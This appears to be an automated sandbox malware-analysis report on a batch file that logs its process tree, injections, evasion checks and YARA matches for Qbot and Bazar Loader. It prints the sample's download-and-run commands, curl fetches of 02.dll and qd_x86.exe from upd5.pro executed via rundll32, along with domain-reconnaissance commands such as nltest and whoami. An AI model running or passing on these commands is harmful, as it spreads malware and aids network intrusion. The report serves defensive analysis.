Source: C:\Windows\System32\rundll32.exe	Code function: String function: 00000001800C6790 appears 133 times

Source: 02.dll.2.dr

Binary string: [25lonecore\windows\core\console\open\src\server\objectheader.cpponecore\windows\core\console\open\src\server\apimessage.cpponecore\windows\core\console\open\src\server\processhandle.cpponecore\windows\core\console\open\src\server\waitblock.cpponecore\windows\core\console\open\src\server\processpolicy.cpponecore\windows\core\console\open\src\server\iodispatchers.cpp\Device\ConDrv\Serveronecore\windows\core\console\open\src\server\winntcontrol.cpponecore\windows\core\console\open\src\interactivity\base\servicelocator.cpponecore\windows\core\console\open\src\interactivity\win32\uiatextrange.cpponecore\windows\core\console\open\src\interactivity\win32\accessibilitynotifier.cpponecore\windows\core\console\open\src\interactivity\win32\windowmetrics.cpponecore\windows\core\console\open\src\interactivity\win32\systemconfigurationprovider.cpponecore\windows\core\console\open\src\interactivity\win32\window.cpponecore\windows\core\console\open\src\interactivity\win32\windowio.cpponecore\windows\core\console\open\src\interactivity\win32\icon.cpponecore\windows\core\console\open\src\interactivity\win32\windowuiaprovider.cpponecore\windows\core\console\open\src\interactivity\win32\windowproc.cpponecore\windows\core\console\open\src\interactivity\win32\clipboard.cpponecore\windows\core\console\open\src\interactivity\win32\screeninfouiaprovider.cpponecore\windows\core\console\open\src\types\viewport.cpponecore\windows\core\console\open\src\types\convert.cpponecore\windows\core\console\open\src\types\utils.cpp

Source: classification engine

Classification label: mal100.troj.evad.winBAT@27/13@3/4

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018001CC70 CertOpenSystemStoreA,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCRLsInStore,CertEnumCRLsInStore,CertCloseStore,

3_2_000000018001CC70

Source: C:\Windows\System32\curl.exe

File created: C:\Users\user\Desktop\02.dll

Jump to behavior

Source: C:\Windows\System32\wermgr.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6928:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3104:120:WilError_03
Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6B4E5A8F-03E1-4126-AAB7-090D37460596}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6600:120:WilError_03
Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\{9263F157-4717-4ABA-8EFD-70F4E97A0B5D}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6460:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\wermgr.exe	Mutant created: \Sessions\1\BaseNamedObjects\wskctabigvrftilyolne

Source: unknown

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\u2.bat" "

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\curl.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\u2.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o 02.dll https://upd5.pro/update/02.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\System32\wermgr.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\qd_x86.exe qd_x86.exe
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
Source: C:\Windows\System32\ipconfig.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all
Source: C:\Windows\System32\whoami.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\System32\nltest.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\qwinsta.exe qwinsta
Source: C:\Windows\System32\qwinsta.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o 02.dll https://upd5.pro/update/02.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\qd_x86.exe qd_x86.exe	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\System32\wermgr.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\qwinsta.exe qwinsta	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\curl.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\qwinsta.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\System32\qwinsta.exe	Section loaded: utildll.dll	Jump to behavior
Source: C:\Windows\System32\qwinsta.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\qwinsta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior

Source:	Binary string: conhost.pdbUGP source: 02.dll.2.dr
Source:	Binary string: Z:\j\projects\qbot4\Release\Win32\qd_x86.pdb source: qd_x86.exe, 00000008.00000000.1799435968.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe, 00000008.00000002.1800368210.0000000000DC8000.00000002.00000001.01000000.00000006.sdmp, qd_x86.exe.5.dr
Source:	Binary string: C:\testing3\data\bdnc\BDNIMBUS-3071711\BDNIMBUS\bin\release\bdnc.pdb source: rundll32.exe, 00000003.00000002.1739313508.0000000180252000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: conhost.pdb source: 02.dll.2.dr

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018004FBF0 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

3_2_000000018004FBF0

PE file contains sections with non-standard names

Source: 02.dll.2.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898475C501 push rsp; ret	3_2_000001898475C50B
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847595F7 push rdx; ret	3_2_00000189847595F8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984759983 push 7E2E5DE3h; iretd	3_2_0000018984759989
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984755A7A push 3A22A9C9h; retf	3_2_0000018984755A87
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898475AB9D push rsp; ret	3_2_000001898475ABC4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847244D4 push ebx; iretd	3_2_00000189847244DD
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_000001898472634A push cs; retn 0000h	3_2_0000018984726386
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000018984724458 push ebx; iretd	3_2_00000189847244DD
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000189847239DD push ds; ret	3_2_00000189847239E5
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00DB4D3B push ecx; ret	8_2_00DB4D4E
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D66EC0 push ecx; ret	8_2_00D66ED3

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\wermgr.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Drops PE files

Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\Desktop\qd_x86.exe			Jump to dropped file
Source: C:\Windows\System32\curl.exe	File created: C:\Users\user\Desktop\02.dll			Jump to dropped file

Boot Survival

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check for Windows Defender sandbox

Source: C:\Windows\System32\rundll32.exe

File Queried: C:\INTERNAL\__empty

Jump to behavior

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select Caption,Description,DeviceID,Manufacturer,Name,PNPDeviceID,Service,Status from Win32_PnPEntity

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_PhysicalMemory

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\wermgr.exe

Window / User API: threadDelayed 1182

Jump to behavior

Found evasive API chain checking for process token information

Source: C:\Users\user\Desktop\qd_x86.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\System32\rundll32.exe

API coverage: 2.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\rundll32.exe TID: 6808

Thread sleep count: 184 > 30

Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : select * from Win32_Bios

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D98074 FindFirstFileExW,FindNextFileW,FindClose,FindClose,

8_2_00D98074

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D64540 GetSystemInfo,

8_2_00D64540

Source: curl.exe, 00000005.00000003.1757684017.000001B929403000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAAS
Source: curl.exe, 00000002.00000003.1705495023.0000014861385000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK0[P

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001802432BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_00000001802432BC

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_000000018004FBF0 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

3_2_000000018004FBF0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D9D5EA GetProcessHeap,

8_2_00D9D5EA

Enables debug privileges

Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\whoami.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00000001802432BC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00000001802432BC
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0000000180227ED0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0000000180227ED0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D922A5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00D922A5
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D66C0A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00D66C0A
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D66DA0 SetUnhandledExceptionFilter,	8_2_00D66DA0
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: 8_2_00D672F7 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00D672F7

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\System32\wermgr.exe base: 22090C90000 protect: page execute and read and write			Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory allocated: C:\Windows\System32\wermgr.exe base: 22090CC0000 protect: page read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\rundll32.exe

Memory written: C:\Windows\System32\wermgr.exe base: 22090C90000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 22090CC0000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 22090C90000	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Memory written: C:\Windows\System32\wermgr.exe base: 7FF783FA6590	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o 02.dll https://upd5.pro/update/02.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32.exe 02.dll,checkit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -o qd_x86.exe https://upd5.pro/update/qd_x86.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 5 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\qd_x86.exe qd_x86.exe	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\wermgr.exe C:\Windows\System32\wermgr.exe	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\whoami.exe whoami /all	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Process created: C:\Windows\System32\qwinsta.exe qwinsta	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D67109 cpuid

8_2_00D67109

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D92779
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D928E6
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D92918
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D9CCD6
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D9CC6B
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D9CC6D
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	8_2_00D9CDFC
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: EnumSystemLocalesW,	8_2_00D9CD71
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,	8_2_00D9D04F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	8_2_00D9D178
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,	8_2_00D9325F
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetLocaleInfoW,	8_2_00D9D27E
Source: C:\Users\user\Desktop\qd_x86.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	8_2_00D9D354

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\rundll32.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\wermgr.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qd_x86.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D613B0 CreateNamedPipeA,ConnectNamedPipe,GetLastError,ReadFile,GetLastError,DisconnectNamedPipe,

8_2_00D613B0

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00000001800744F0 GetProcAddress,GetSystemTimeAsFileTime,

3_2_00000001800744F0

Source: C:\Users\user\Desktop\qd_x86.exe

Code function: 8_2_00D61AD0 GetFileAttributesW,GetModuleHandleA,GetUserNameW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcmpW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,Sleep,lstrlenA,

8_2_00D61AD0

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_0000000180061840 GetVersion,RegOpenKeyExA,GetLastError,RegOpenKeyExA,GetLastError,RegCloseKey,RegCloseKey,RegOpenKeyExA,GetLastError,RegCloseKey,

3_2_0000000180061840

Source: C:\Windows\System32\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\System32\wermgr.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Bazar Loader

Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1740122551.0000018984731000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740081515.0000018984700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Qbot

Source: Yara match	File source: 3.2.rundll32.exe.1898470280d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.18984734000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470280d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.18984734000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.rundll32.exe.1898470060d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.1740153839.0000018984734000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740300202.00000189849C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1740238507.0000018984761000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
